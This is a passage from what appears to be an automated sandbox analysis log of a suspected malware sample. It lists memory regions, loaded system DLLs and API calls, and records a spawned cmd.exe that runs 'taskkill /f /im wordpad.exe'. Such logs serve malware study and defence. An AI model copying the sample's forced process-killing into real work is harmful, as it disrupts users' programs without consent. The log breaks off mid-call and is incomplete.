filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5957 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5958 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5959 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5960 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5961 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 5962 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 5963 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5964 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 5965 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5966 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5967 start_va = 0x4480000 end_va = 0x44affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 5968 start_va = 0x44e0000 end_va = 0x4667fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Region: id = 5969 start_va = 0x4670000 end_va = 0x4699fff monitored = 0 entry_point = 0x4675680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5970 start_va = 0x46c0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 5971 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5972 start_va = 0x47c0000 end_va = 0x4940fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047c0000" filename = "" Region: id = 5973 start_va = 0x4950000 end_va = 0x5d4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004950000" filename = "" Region: id = 5974 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5975 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 5976 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 5977 start_va = 0x44a0000 end_va = 0x44affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 5978 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 5979 start_va = 0x44b0000 end_va = 0x44b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 5980 start_va = 0x5d50000 end_va = 0x6086fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5981 start_va = 0x6090000 end_va = 0x6179fff monitored = 0 entry_point = 0x60cd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5982 start_va = 0x44c0000 end_va = 0x44c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 5983 start_va = 0x6090000 end_va = 0x616ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 5984 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5985 start_va = 0x4670000 end_va = 0x4670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004670000" filename = "" Region: id = 5986 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5987 start_va = 0x4680000 end_va = 0x4680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004680000" filename = "" Region: id = 5988 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 5989 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 5990 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5991 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 5992 start_va = 0x6170000 end_va = 0x61affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006170000" filename = "" Region: id = 5993 start_va = 0x61b0000 end_va = 0x61effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061b0000" filename = "" Region: id = 5994 start_va = 0x61f0000 end_va = 0x622ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061f0000" filename = "" Region: id = 5995 start_va = 0x6230000 end_va = 0x626ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006230000" filename = "" Region: id = 5996 start_va = 0x6270000 end_va = 0x62affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006270000" filename = "" Region: id = 5997 start_va = 0x62b0000 end_va = 0x62effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062b0000" filename = "" Region: id = 5998 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 5999 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 6000 start_va = 0x4690000 end_va = 0x4695fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004690000" filename = "" Thread: id = 415 os_tid = 0x1128 Thread: id = 416 os_tid = 0x998 Thread: id = 417 os_tid = 0xcfc Thread: id = 418 os_tid = 0xf2c Thread: id = 419 os_tid = 0x1038 Process: id = "85" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2cfd2000" os_pid = "0x101c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im wordpad.exe\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6003 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6004 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6005 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6006 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6007 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6008 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6009 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6010 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6011 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6012 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6013 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 6014 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6015 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6016 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6017 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6018 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 6019 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6020 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 6021 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 6022 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6023 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6024 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6025 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6026 start_va = 0x500000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 6027 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6028 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6029 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6030 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6031 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6032 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6033 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 6034 start_va = 0x550000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 6035 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 6036 start_va = 0x750000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 6037 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6038 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6039 start_va = 0x8a0000 end_va = 0xbd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 420 os_tid = 0x1020 [0228.763] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0228.763] __set_app_type (_Type=0x1) [0228.763] __p__fmode () returned 0x74974d6c [0228.763] __p__commode () returned 0x74975b1c [0228.763] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0228.764] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0228.764] GetCurrentThreadId () returned 0x1020 [0228.764] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x1020) returned 0x78 [0228.764] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0228.764] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0228.764] SetThreadUILanguage (LangId=0x0) returned 0x409 [0228.769] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0228.769] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0228.769] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0228.769] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0228.769] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0228.769] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0228.770] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0228.770] GetConsoleOutputCP () returned 0x1b5 [0228.770] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0228.771] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0228.771] _get_osfhandle (_FileHandle=1) returned 0x144 [0228.771] SetConsoleMode (hConsoleHandle=0x144, dwMode=0x0) returned 0 [0228.771] _get_osfhandle (_FileHandle=1) returned 0x144 [0228.771] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0228.771] _get_osfhandle (_FileHandle=0) returned 0x140 [0228.771] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0228.771] GetEnvironmentStringsW () returned 0x557fe8* [0228.771] GetProcessHeap () returned 0x550000 [0228.771] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa1a) returned 0x558a10 [0228.771] FreeEnvironmentStringsA (penv="A") returned 1 [0228.771] GetProcessHeap () returned 0x550000 [0228.771] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x4) returned 0x557e68 [0228.771] GetEnvironmentStringsW () returned 0x557fe8* [0228.771] GetProcessHeap () returned 0x550000 [0228.771] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa1a) returned 0x559438 [0228.771] FreeEnvironmentStringsA (penv="A") returned 1 [0228.772] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0228.772] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0228.772] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0228.772] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0228.772] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0228.772] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0228.772] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0228.772] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0228.772] RegCloseKey (hKey=0x88) returned 0x0 [0228.772] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0228.772] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0228.772] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0228.772] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0228.772] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0228.772] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0228.773] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0228.773] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0228.773] RegCloseKey (hKey=0x88) returned 0x0 [0228.773] time (in: timer=0x0 | out: timer=0x0) returned 0x62344253 [0228.773] srand (_Seed=0x62344253) [0228.773] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im wordpad.exe\"" [0228.773] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im wordpad.exe\"" [0228.773] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0228.773] GetProcessHeap () returned 0x550000 [0228.773] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x210) returned 0x556f98 [0228.773] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x556fa0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0228.773] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0228.773] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0228.773] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0228.773] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0228.773] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0228.773] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0228.774] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0228.774] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0228.774] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0228.774] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0228.774] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0228.774] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0228.774] GetProcessHeap () returned 0x550000 [0228.775] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x558a10) returned 1 [0228.775] GetEnvironmentStringsW () returned 0x557fe8* [0228.775] GetProcessHeap () returned 0x550000 [0228.775] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa32) returned 0x55a8a0 [0228.775] FreeEnvironmentStringsA (penv="A") returned 1 [0228.775] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0228.775] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0228.775] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0228.775] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0228.775] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0228.775] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0228.775] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0228.775] _wcsicmp 